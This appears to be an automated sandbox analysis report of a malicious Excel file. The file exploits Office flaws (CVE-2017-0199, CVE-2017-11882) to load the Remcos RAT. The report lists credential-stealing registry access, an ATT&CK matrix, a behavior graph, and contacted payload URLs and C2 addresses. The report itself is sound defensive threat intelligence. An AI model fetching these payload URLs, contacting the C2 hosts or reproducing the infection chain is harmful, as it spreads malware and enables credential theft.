                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Identities\{56EE7341-F593-4666-B32B-0DA2F15C6755}\Software\Microsoft\Office\Outlook\OMI Account Manager\AccountsJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\ProfilesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\06cf47254c38794586c61cc24a734503Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\0a0d020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\13dbb0c8aa05101a9bb000aa002fc45aJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\205c3a58330443458dd2ac448e6ca789Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\2b8b37090290ba4f959e518e299cb5b1Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\3743a3c1c7e1f64e8f29008dfcb85743Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\53408158a6e73f408d707c6c9897ca11Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\5d87f524a0d3e441a43ef4f9aa2c1e35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\78c2c8d3c60b8e4dbd322a28757b4addJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\8503020000000000c000000000000046Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9207f3e0a3b11019908b08002b2a56c2Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000002Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676\00000003Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\b17a5dedc883424088e68fc9f8f9ce35Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\ddb0922fc50b8d42be5a821ede840761Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f6b27b1a9688564abf9b7e1bd5ef7ca7Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\f86ed2903a4a11cfb57e524153480001Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows Live MailJump to behavior
                  Tries to steal Mail credentials (via file registry)
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: ESMTPPassword16_2_004033F0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, PopPassword16_2_00402DB3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: _mbscpy,_mbscpy,_mbscpy,_mbscpy,RegCloseKey, SMTPPassword16_2_00402DB3
                  Yara detected WebBrowserPassView password recovery tool
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 1908, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Detected Remcos RAT
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeMutex created: \Sessions\1\BaseNamedObjects\Rmc-4CT19TJump to behavior
                  Yara detected Remcos RAT
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 14.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 12.2.powershell.exe.417eb20.1.raw.unpack, type: UNPACKEDPE
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000315000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041669292.0000000000331000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: powershell.exe PID: 2900, type: MEMORYSTR
                  Source: Yara matchFile source: Process Memory Space: RegAsm.exe PID: 2496, type: MEMORYSTR
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: cmd.exe14_2_0040569A

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity Information121
                  Scripting                  		Valid Accounts11
                  Native API                  		121
                  Scripting                  		1
                  DLL Side-Loading                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		2
                  System Time Discovery                  		Remote Services11
                  Archive Collected Data                  		15
                  Ingress Tool Transfer                  		Exfiltration Over Other Network Medium1
                  System Shutdown/Reboot
                  CredentialsDomainsDefault Accounts43
                  Exploitation for Client Execution                  		1
                  DLL Side-Loading                  		1
                  Bypass User Account Control                  		21
                  Obfuscated Files or Information                  		111
                  Input Capture                  		1
                  Account Discovery                  		Remote Desktop Protocol1
                  Data from Local System                  		21
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts123
                  Command and Scripting Interpreter                  		1
                  Windows Service                  		1
                  Access Token Manipulation                  		1
                  DLL Side-Loading                  		2
                  Credentials in Registry                  		1
                  System Service Discovery                  		SMB/Windows Admin Shares2
                  Email Collection                  		1
                  Remote Access Software                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal Accounts2
                  Service Execution                  		Login Hook1
                  Windows Service                  		1
                  Bypass User Account Control                  		3
                  Credentials In Files                  		4
                  File and Directory Discovery                  		Distributed Component Object Model111
                  Input Capture                  		3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud Accounts3
                  PowerShell                  		Network Logon Script422
                  Process Injection                  		1
                  Masquerading                  		LSA Secrets38
                  System Information Discovery                  		SSH3
                  Clipboard Data                  		114
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts21
                  Virtualization/Sandbox Evasion                  		Cached Domain Credentials3
                  Security Software Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
                  Access Token Manipulation                  		DCSync21
                  Virtualization/Sandbox Evasion                  		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job422
                  Process Injection                  		Proc Filesystem4
                  Process Discovery                  		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                  Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAtHTML Smuggling/etc/passwd and /etc/shadow1
                  Application Window Discovery                  		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                  IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCronDynamic API ResolutionNetwork Sniffing1
                  System Owner/User Discovery                  		Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                  Network Security AppliancesDomainsCompromise Software Dependencies and Development ToolsAppleScriptLaunchdLaunchdStripped PayloadsInput Capture1
                  Remote System Discovery                  		Software Deployment ToolsRemote Data StagingMail ProtocolsExfiltration Over Unencrypted Non-C2 ProtocolFirmware Corruption

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1500777 Sample: SecuriteInfo.com.MSExcel.CV... Startdate: 28/08/2024 Architecture: WINDOWS Score: 100 63 zhort.de 2->63 85 Suricata IDS alerts for network traffic 2->85 87 Found malware configuration 2->87 89 Malicious sample detected (through community Yara rule) 2->89 91 21 other signatures 2->91 11 EXCEL.EXE 33 31 2->11         started        signatures3 process4 dnsIp5 67 zhort.de 88.99.66.38, 443, 49161, 49163 HETZNER-ASDE Germany 11->67 69 198.12.81.228, 49162, 49169, 49170 AS-COLOCROSSINGUS United States 11->69 55 ~$SecuriteInfo.com...oit.16063.8851.xlsx, data 11->55 dropped 57 sreemanganshekumar...otheroadwith[1].doc, Rich 11->57 dropped 15 wscript.exe 1 11->15         started        18 WINWORD.EXE 348 33 11->18         started        file6 process7 dnsIp8 113 Suspicious powershell command line found 15->113 115 Wscript starts Powershell (via cmd or directly) 15->115 117 Very long command line found 15->117 125 3 other signatures 15->125 22 powershell.exe 4 15->22         started        65 zhort.de 18->65 45 C:\Users\user\AppData\...\zhort.de.url, MS 18->45 dropped 47 C:\Users\user\AppData\Roaming\...\UlEYs1.url, MS 18->47 dropped 49 ~WRF{5CA061CB-7A8F...F-239624BEF21A}.tmp, Composite 18->49 dropped 51 C:\Users\user\AppData\Local\...\F9C7AC5D.doc, Rich 18->51 dropped 119 Microsoft Office launches external ms-search protocol handler (WebDAV) 18->119 121 Office viewer loads remote template 18->121 123 Microsoft Office drops suspicious files 18->123 25 EQNEDT32.EXE 12 18->25         started        file9 signatures10 process11 file12 93 Suspicious powershell command line found 22->93 95 Suspicious execution chain found 22->95 28 powershell.exe 12 5 22->28         started        53 C:\...\creatednewimagesinpicturebuttersmo.vBS, Unicode 25->53 dropped 97 Office equation editor establishes network connection 25->97 99 Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802) 25->99 signatures13 process14 dnsIp15 71 ia803104.us.archive.org 207.241.232.154, 443, 49171 INTERNET-ARCHIVEUS United States 28->71 109 Writes to foreign memory regions 28->109 111 Injects a PE file into a foreign processes 28->111 32 RegAsm.exe 3 10 28->32         started        36 RegAsm.exe 28->36         started        signatures16 process17 dnsIp18 59 192.3.101.172, 2404, 49173, 49174 AS-COLOCROSSINGUS United States 32->59 61 geoplugin.net 178.237.33.50, 49175, 80 ATOM86-ASATOM86NL Netherlands 32->61 73 Detected Remcos RAT 32->73 75 Maps a DLL or memory area into another process 32->75 38 RegAsm.exe 1 32->38         started        41 RegAsm.exe 1 32->41         started        43 RegAsm.exe 11 32->43         started        77 Contains functionality to bypass UAC (CMSTPLUA) 36->77 79 Tries to steal Mail credentials (via file registry) 36->79 81 Contains functionality to steal Chrome passwords or cookies 36->81 83 4 other signatures 36->83 signatures19 process20 signatures21 101 Tries to steal Instant Messenger accounts or passwords 38->101 103 Tries to steal Mail credentials (via file / registry access) 38->103 105 Searches for Windows Mail specific files 38->105 107 Tries to harvest and steal browser information (history, passwords, etc) 41->107

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                  windows-stand

                  Antivirus, Machine Learning and Genetic Malware Detection

                  Initial Sample

                  SourceDetectionScannerLabelLink
                  SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx18%ReversingLabs
                  SecuriteInfo.com.MSExcel.CVE_2017_0199.DDOC.exploit.16063.8851.xlsx100%Joe Sandbox ML

                  Dropped Files

                  SourceDetectionScannerLabelLink
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\F9C7AC5D.doc100%AviraHEUR/Rtf.Malformed
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith[1].doc100%AviraHEUR/Rtf.Malformed
                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{5CA061CB-7A8F-4A69-A3FF-239624BEF21A}.tmp100%AviraEXP/CVE-2017-11882.Gen

                  Unpacked PE Files

                  No Antivirus matches

                  Domains

                  No Antivirus matches

                  URLs

                  SourceDetectionScannerLabelLink
                  http://b.scorecardresearch.com/beacon.js0%URL Reputationsafe
                  http://acdn.adnxs.com/ast/ast.js0%URL Reputationsafe
                  http://www.imvu.comr0%URL Reputationsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_0%URL Reputationsafe
                  http://ocsp.entrust.net030%URL Reputationsafe
                  https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=10%URL Reputationsafe
                  https://contoso.com/License0%URL Reputationsafe
                  https://support.google.com/chrome/?p=plugin_flash0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.png0%URL Reputationsafe
                  http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
                  https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=90%URL Reputationsafe
                  http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.html0%URL Reputationsafe
                  https://deff.nelreports.net/api/report?cat=msn0%URL Reputationsafe
                  https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js0%URL Reputationsafe
                  http://cache.btrll.com/default/Pix-1x1.gif0%URL Reputationsafe
                  http://pr-bh.ybp.yahoo.com/sync/msft/16145220553121086830%URL Reputationsafe
                  http://geoplugin.net/json.gp/C0%URL Reputationsafe
                  http://o.aolcdn.com/ads/adswrappermsni.js0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/msn-home-network/loader.js0%URL Reputationsafe
                  https://contoso.com/0%URL Reputationsafe
                  https://nuget.org/nuget.exe0%URL Reputationsafe
                  http://static.chartbeat.com/js/chartbeat.js0%URL Reputationsafe
                  https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg100%URL Reputationmalware
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%0%URL Reputationsafe
                  https://login.yahoo.com/config/login0%URL Reputationsafe
                  http://ocsp.entrust.net0D0%URL Reputationsafe
                  http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
                  https://contextual.media.net/803288796/fcmain.js?&gdpr=1&cid=8CUT39MWR&cpcd=2K6DOtg60bLnBhB3D4RSbQ%30%URL Reputationsafe
                  http://ib.adnxs.com/pxj?bidder=18&seg=378601&action=setuids(0%URL Reputationsafe
                  https://cvision.media.net/new/286x175/3/72/42/210/948f45db-f5a0-41ce-a6b6-5cc9e8c93c16.jpg?v=90%URL Reputationsafe
                  http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_80%2Ch_334%2Cw_312%2Cc_fill%2Cg_faces%2Ce_sh0%URL Reputationsafe
                  http://cdn.taboola.com/libtrc/impl.thin.277-63-RELEASE.js0%URL Reputationsafe
                  http://nuget.org/NuGet.exe0%URL Reputationsafe
                  https://www.ccleaner.com/go/app_cc_pro_trialkey0%URL Reputationsafe
                  http://crl.entrust.net/server1.crl00%URL Reputationsafe
                  https://contextual.media.net/8/nrrV73987.js0%URL Reputationsafe
                  http://www.imvu.com0%URL Reputationsafe
                  https://contoso.com/Icon0%URL Reputationsafe
                  https://contextual.media.net/0%URL Reputationsafe
                  http://widgets.outbrain.com/external/publishers/msn/MSNIdSync.js0%URL Reputationsafe
                  https://ia803104.us.archive.org0%Avira URL Cloudsafe
                  https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%20%URL Reputationsafe
                  https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:au0%URL Reputationsafe
                  http://geoplugin.net/json.gp0%URL Reputationsafe
                  http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%Avira URL Cloudsafe
                  https://dc.ads.linkedin.com/collect/?pid=6883&opid=7850&fmt=gif&ck=&3pc=true&an_user_id=5916504975490%URL Reputationsafe
                  http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doc0%Avira URL Cloudsafe
                  http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.com0%Avira URL Cloudsafe
                  http://cdn.at.atwola.com/_media/uac/msn.html0%URL Reputationsafe
                  http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIF0%Avira URL Cloudsafe
                  http://dis.criteo.com/dis/usersync.aspx?r=7&p=3&cp=appnexus&cu=1&url=http%3A%2F%2Fib.adnxs.com%2Fset0%URL Reputationsafe
                  https://secure.comodo.com/CPS00%URL Reputationsafe
                  https://www.google.com0%Avira URL Cloudsafe
                  https://policies.yahoo.com/w3c/p3p.xml0%URL Reputationsafe
                  http://crl.entrust.net/2048ca.crl00%URL Reputationsafe
                  http://www.msn.com/?ocid=iehp0%Avira URL Cloudsafe
                  https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=10330%Avira URL Cloudsafe
                  http://www.ebuddy.com0%URL Reputationsafe
                  http://www.msn.com/de-de/?ocid=iehp0%Avira URL Cloudsafe
                  https://zhort.de/UlEYs10%Avira URL Cloudsafe
                  http://www.nirsoft.net00%Avira URL Cloudsafe
                  http://www.nirsoft.net/0%Avira URL Cloudsafe
                  https://ia803104.us.archive.org/27/items/vbs_20240LR0%Avira URL Cloudsafe
                  http://p.rfihub.com/cm?in=1&pub=345&userid=16145220553121086830%Avira URL Cloudsafe
                  http://198.12.81.2280%Avira URL Cloudsafe
                  http://www.imvu.com/NK0%Avira URL Cloudsafe
                  http://198.12.81.228/600/RGGV.txt0%Avira URL Cloudsafe
                  http://www.msn.com/0%Avira URL Cloudsafe
                  http://crl.pkioverheid.nl/DomOvLatestCRL.crl00%Avira URL Cloudsafe
                  192.3.101.1720%Avira URL Cloudsafe
                  https://zhort.de/UlEYs1f0%Avira URL Cloudsafe
                  http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFj0%Avira URL Cloudsafe
                  https://www.google.com/accounts/servicelogin0%Avira URL Cloudsafe
                  http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFc0%Avira URL Cloudsafe
                  https://zhort.de/UlEYs1yX0%Avira URL Cloudsafe
                  https://zhort.de/0%Avira URL Cloudsafe
                  http://www.msn.com/advertisement.ad.js0%Avira URL Cloudsafe

                  Domains and IPs

                  Contacted Domains

                  NameIPActiveMaliciousAntivirus DetectionReputation
                  zhort.de
                  		88.99.66.38
                  		truetrue
                    		unknown
                    geoplugin.net
                    		178.237.33.50
                    		truefalse
                      		unknown
                      ia803104.us.archive.org
                      		207.241.232.154
                      		truetrue
                        		unknown

                        Contacted URLs

                        NameMaliciousAntivirus DetectionReputation
                        http://198.12.81.228/600/gv/sreemanganshekumarsayingbuttersmoothbunneverhandlingthesweetmilkbunwhichreallytastywithbuttersmooththings_________getitsbacktotheroadwith.doctrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://198.12.81.228/600/creatednewimagesinpicturebuttersmooth.tIFtrue
                        • Avira URL Cloud: safe
                        		unknown
                        https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpgtrue
                        • URL Reputation: malware
                        		unknown
                        https://zhort.de/UlEYs1false
                        • Avira URL Cloud: safe
                        		unknown
                        http://198.12.81.228/600/RGGV.txttrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gpfalse
                        • URL Reputation: safe
                        		unknown
                        192.3.101.172true
                        • Avira URL Cloud: safe
                        		unknown

                        URLs from Memory and Binaries

                        NameSourceMaliciousAntivirus DetectionReputation
                        http://b.scorecardresearch.com/beacon.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://acdn.adnxs.com/ast/ast.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.imvu.comrRegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_167%2Cw_312%2Cc_fill%2Cg_faces%2Ce_bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ia803104.us.archive.orgpowershell.exe, 0000000C.00000002.438679378.0000000002359000.00000004.00000800.00020000.00000000.sdmptrue
                        • Avira URL Cloud: safe
                        		unknown
                        http://ocsp.entrust.net03powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://contoso.com/Licensepowershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://support.google.com/chrome/?p=plugin_flashRegAsm.exe, 0000000F.00000002.448125301.0000000000DC8000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/static/thumbnails/f539211219b796ffbb49949997c764f0.pngbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://www.diginotar.nl/cps/pkioverheid0powershell.exe, 0000000C.00000002.441938406.0000000004FCF000.00000004.00000020.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://cvision.media.net/new/286x175/2/137/169/197/852af93e-e705-48f1-93ba-6ef64c8308e6.jpg?v=9bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://acdn.adnxs.com/ib/static/usersync/v3/async_usersync.htmlbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://deff.nelreports.net/api/report?cat=msnbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.imvu.comhttp://www.ebuddy.comhttps://www.google.comRegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://cache.btrll.com/default/Pix-1x1.gifbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://pr-bh.ybp.yahoo.com/sync/msft/1614522055312108683bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.google.comRegAsm.exe, RegAsm.exe, 00000011.00000002.445648519.0000000000400000.00000040.80000000.00040000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://geoplugin.net/json.gp/Cpowershell.exe, 0000000C.00000002.439632807.0000000003E59000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000002.1041828319.0000000000400000.00000040.00000400.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        http://o.aolcdn.com/ads/adswrappermsni.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://cdn.taboola.com/libtrc/msn-home-network/loader.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.msn.com/?ocid=iehpbhvA42C.tmp.15.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        https://contoso.com/powershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://nuget.org/nuget.exepowershell.exe, 0000000C.00000002.439632807.0000000003249000.00000004.00000800.00020000.00000000.sdmpfalse
                        • URL Reputation: safe
                        		unknown
                        https://www.msn.com/en-us/homepage/secure/silentpassport?secure=false&lc=1033bhvA42C.tmp.15.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://static.chartbeat.com/js/chartbeat.jsbhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        http://www.msn.com/de-de/?ocid=iehpbhvA42C.tmp.15.drfalse
                        • Avira URL Cloud: safe
                        		unknown
                        http://images.taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_90%2Cw_120%2Cc_fill%2Cg_faces:auto%bhvA42C.tmp.15.drfalse
                        • URL Reputation: safe
                        		unknown
                        https://login.yahoo.com/config/loginRegAsm.exefalse
                        • URL Reputation: safe
                        		unknown
                        http://www.nirsoft.net0RegAsm.exe, 0000000F.00000002.447784397.0000000000154000.00000004.00000010.00020000.00000000.sdmpfalse
                        • Avira URL Cloud: safe
                        		unknown
